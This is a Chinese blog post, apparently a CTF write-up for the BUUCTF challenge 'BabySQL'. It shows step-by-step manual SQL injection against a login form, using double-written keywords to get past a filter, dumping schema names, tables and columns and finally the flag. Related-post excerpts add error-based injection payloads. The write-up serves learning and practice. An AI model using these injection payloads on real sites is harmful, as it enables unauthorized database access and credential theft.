极客大挑战 2019BabySQL(手动sql注入)

最新推荐文章于 2024-03-28 00:22:57 发布
最新推荐文章于 2024-03-28 00:22:57 发布
阅读量869 收藏 2
点赞数 3
分类专栏: ctfWP 文章标签: unctf 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20533167/article/details/113729421
版权

[极客大挑战 2019]BabySQL,熟悉的界面,这个题的第三次变体了吧

[极客大挑战 2019]BabySQL(手动sql注入)

  • [极客大挑战 2019]BabySQL,熟悉的界面,这个题的第三次变体了吧

  • 试一下万能密码

  • 本来打算直接抓包的,看到一位师傅,直接给双写绕过了,试了试果然有用(还把+给过滤了1=1–+用不了了)

  • 接下来和原来的操作基本一样,继续手动注入【别忘了双写绕过!】

  • 按照2019lovesql那个的完全一样,再试一遍

  • 用order by或者union select确定字段数和回显位置

  • 当前连接的数据库?username=admin&password=pwd%20%27 ununionion seselectlect 1,2,database() %23

  • 查询所有的数据库

  • ?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata) %23

  • 查表?username=admin&password=pwd %27 ununionion seselectlect 1,2,

  • group_concat(table_name)frfromom(infoorrmation_schema.tables)whwhereere table_schema=“ctf” %23只有一个flag表

  • 查字段名?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name=“Flag”%23只有一个flag字段

  • http://f3cee328-d0b2-4752-8cc0-7ed2f6a341f2.node3.buuoj.cn/check.php?username=admin&password=pwd%20%27%20ununionion%20seselectlect%201,2,group_concat(flag)frfromom(ctf.Flag)%23 *

  • flag{f17dfb1a-8399-47b5-90fb-765faeab1fdc}

4pri1
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF学习笔记——[挑战 2019]BabySQL
Obs_cure的博客
02-09 1377
一、[挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
[挑战 2019]BabySQL
qq_45237160的博客
01-12 350
我们首先用万能密码尝试登录,提示我们账号或者密码错误,可以证明 符号 or并没有起作用,应该是被过滤掉了,也证明了此处仍然存在注入点。然后爆表,这里试了好多次,一直以为information和schema也被过滤了,后来发现并没有,过滤的还是or,from也被过滤了。接下来联合查询进行查询回显的点,仍然报错 ,根据报错信息可知:union,select都被过滤为空了。访问链接,我们看到熟悉的界面,不过页面上的提示内容变了,告诉了我们这里会有过滤。仍然复写绕过,得到回显点,2和3处。
BabySQL【2019挑战
最新发布
I_WORM的博客
03-28 1042
构造payload:username=3'+||+extractvalue(1,concat(0x7e,mimidd((seselectlect+group_concat(username,':',passwoorrd)+frfromom+b4bsql)+,181,30),0x7e))=1--+发现返回了完整的错误提示,一开始没明白是什么意思,更换payload测了几次后才发觉or应该被过滤了,尝试了or 'a'='a'--+ or '1'='1' --+;既然能成功注入了,又获得了完整的错误提示。
挑战2019babysql
kindyyy的博客
04-08 1222
我也是参考了大佬的wp才会做的题目..... 大佬博:[挑战 2019]BabySQL - 云千 - 博园 (对我自己来说)要一步一步的从查库,查表,查列,查字段慢慢来,从这道题我们还要注意有些命令是会被注释的,可以用双写绕过。 大概就是这样。先看题目吧: ...
sql联合注入步骤例题LoveSQLBabySQL(双写绕过)
qq_58970968的博客
04-04 1275
拿到题目有登录界面 1.想到万能密码: 1' or 1=1# 发现登录成功;但是拿到这个页面毫无卵用;浪费时间,由于是一道考sql注入的题,想到后台肯定有表字段这些,flag就藏在里面,爆出他们就行了; 2:查有多少字段: 1'order by 4# 这时报错,说明有三个字段, 3.有三个字段之后在看回显,也就是说看显示的是哪几个字段;: 1' union select 1,2,3# 回显了2和3;回显字段为第二个和第三个; 4.然后爆数据库名: 1' union select .
阿里云IoT创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 创新挑战赛》的分享,就挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
浅谈一次与sql注入 & webshell 的美丽“邂逅”
01-19
sql注入与“她”相遇 某一天,天气晴朗,心情舒畅。“她”来了,打破了笔者的美好时光。下午2点多钟,笔者和朋友在苏州街的天使汇二楼咖啡参加某个云厂商的Kubernetes一场技术沙龙,正听得兴致勃勃的时候,笔者...
2019年三诺集团四周年庆典摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典摇滚跑活动方案
汽车品牌车系车型sql数据库.zip
09-01
汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库....
学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 学院JAVA视频教程 新版 7大部分
BUUCTF [挑战 2019]BabySQL
qq_52999628的博客
08-16 905
今天来做一道sql注入题,做这类题之前一直没有什么头绪,经常是各种常用的语句胡乱注入一通,所以这次想来完整记录一下整体思路,以供以后参考。 首先输入1'
buuctf [挑战 2019]BabySQL
qq_52671379的博客
05-10 281
buuctf [挑战 2019]BabySQL
[挑战 2019]BabySQL 1
B_cecretary的博客
07-28 968
[挑战 2019]BabySQL 1
buuctf 挑战 babysql
SopRomeo的博客
01-17 1671
emmmmm这道题,常规注入不可行,很明显过滤了什么字符,我试了下双写,没想到可行。。 接着就直接上图吧 跟之前lovesql差不多
[挑战 2019]BabySQL 1(双写绕过)
weixin_45253573的博客
12-08 1520
存在sql注入漏洞 username:1’ order by 2# password:1 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘der 2#’ and password='1’’ at line 1 or被过滤 username:1’ union select ..
挑战 2019]BabySQL
shannidawang的博客
07-24 91
知识点:双写绕过 先进行测试 ?username=admin&password=123'union select 1?# You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1?'' at line 1 根据回显说明union select被检测到了 猜测使用replace函

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值